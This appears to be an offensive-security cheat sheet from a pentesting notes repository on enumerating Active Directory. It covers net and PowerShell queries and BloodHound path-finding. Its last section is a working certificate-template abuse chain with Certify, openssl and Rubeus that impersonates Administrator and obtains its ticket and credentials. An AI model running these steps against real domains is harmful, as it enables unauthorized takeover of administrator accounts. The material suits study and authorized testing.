killchain-compendium/Cryptography/Active Directory/AD Enumeration.md

150 lines
4.3 KiB
Markdown
Raw Normal View History

2022-11-13 16:00:22 +01:00
# Enumerate Active Directory
Enumeration following after initial credentials are gained
## SYSVOL
* On windows use `runas` and gain local administrative permissions via
```sh
runas.exe /netonly /user:%FQDNORNETBIOSDOMAIN%\%USERNAME% cmd.exe
```
* Check validity of credentials against `SYSVOL`, it stores __Group Policy Objects (GPO)__. Every AD account will gain access
* Query DNS, for example the DC
```sh
$dnsip = "<DC IPaddress>"
$index = Get-NetAdapter -Name '<Ethernet>' | Select-Object -ExpandProperty 'ifIndex'
Set-DnsClientServerAddress -InterfaceIndex $index -ServerAddresses $dnsip
```
* Check `SYSVOL` afterwards via `hostname` to verify via Kerberos auth
```sh
dir \\%HOSTNAME%\SYSVOL\
```
* Check `SYSVOL` via `IP` address to force `NTLM` authentication
## Microsoft Management Console (MMC)
* Use AD Snap-ins of `Remote Server Administrative Tools`
* Start -> Apps & Features -> Manage Optional Features -> Add a feature -> Search `RSAT` -> Select `RSAT: Active Directory Domain Services and Lightweight Directory Tools` -> Install
* `Win` + `r` -> `MMC` -> File -> Add/Remove Snap-in -> add 3 AD feature snap-ins -> right click `Active Directory Sites and Services` -> `Change Forest` -> Add root domain -> right click `Active Directory Users and Computers` -> Change Domain -> enter root domain -> right click `Active Directory Users and Computers ` -> View -> Advanced Features
* Start enumerating via click on the domain object in the tree on the left
* Take a look at `People` directory -> right click on them to see properties
* Change or create user or change groups
* Also use `MMC` to enumerate
## CMD enumeration
Execute from domain joined machine
* Users
```sh
net user /domain
```
* Specific user
```sh
net user <username> /domain
```
* Groups
```sh
net group /domain
```
* Specific group
```sh
net group <groupname> /domain
```
* Password Policy via accounts
```sh
net accounts /domain
```
## Powershell Cmdlets
* User details via
```sh
Get-ADUser -Identity <username> -Server <fqdn/or/DCdomain> -Properties *
```
* Groups
```sh
Get-ADGroup -Identity Administrators -Server exampleDC.com -Properties *
```
* Group membership
```sh
Get-ADGroupMember -Identity Administrators -Server exampleDC.com
```
* Generic AD objects
```sh
Get-ADObject -Filter <filterstuff> -includeDeletedObjects -Server exampleDC.com
Get-ADObject -Filter 'badPwdCount -gt 0' -Server exampleDC.com
```
* Domains
```sh
Get-ADDomain -Server exampleDC.com
```
## Sharphound and Bloodhound
* [BloodHound documentation](https://bloodhound.readthedocs.io/en/latest/index.html#)
* Change to AD user via `runas.exe` and collect via one of the following
* Sharphound.ps1
* sharphound.exe
* Azurehound.ps1
* For example
```sh
Sharphound.exe --CollectionMethods <Default/Session/All> --Domain example.com --ExcludeDCs
```
* After some time collect the current sessions via
```sh
Sharphound.exe --CollectionMethods Session --Domain example.com --ExcludeDCs
```
* Start neo4j db
```sh
neo4j console start
```
* Start bloodhound
```sh
bloodhound --no-sandbox
```
* Drag and Drop the zip file from Sharphound
* Either search for AD objects and use `Analysis` to find an attack path through the info on the edges
* Shows exploitable accounts in the `Analysis` tab, for example kerberroastable accounts
## LDAP
## PowerView
2023-11-14 20:36:49 +01:00
Registered Machines in the domain
```sh
Get-NetComputer | select "name"
```
When the computers were added to the domain
```sh
Get-ADComputer -filter * -properties whencreated | Select Name,@{n="Owner";e={(Get-acl "ad:\$($_.distinguishedname)").owner}},whencreated
```
2022-11-13 16:00:22 +01:00
## WMI
2023-03-25 15:31:51 +01:00
## Find Certifications and Private Keys
Certification Services can be found with [the Certify tool](https://github.com/GhostPack/Certify.git).
* Enumerate vunerabilities on the current user via Certify, use `FullName` found in the first step to insert domain in the second step
```sh
Certify.exe find /vulnerable /currentuser
.\Certify.exe request /ca:$FULL_NAME /template:UserAuthentication /altname:Administrator
```
* Copy the found key and convert it like mentioned in the last line of the ouptut, for example
```sh
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
```
* Get ticket with the the loot via Rubeus
```
.\Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /getcredentials
```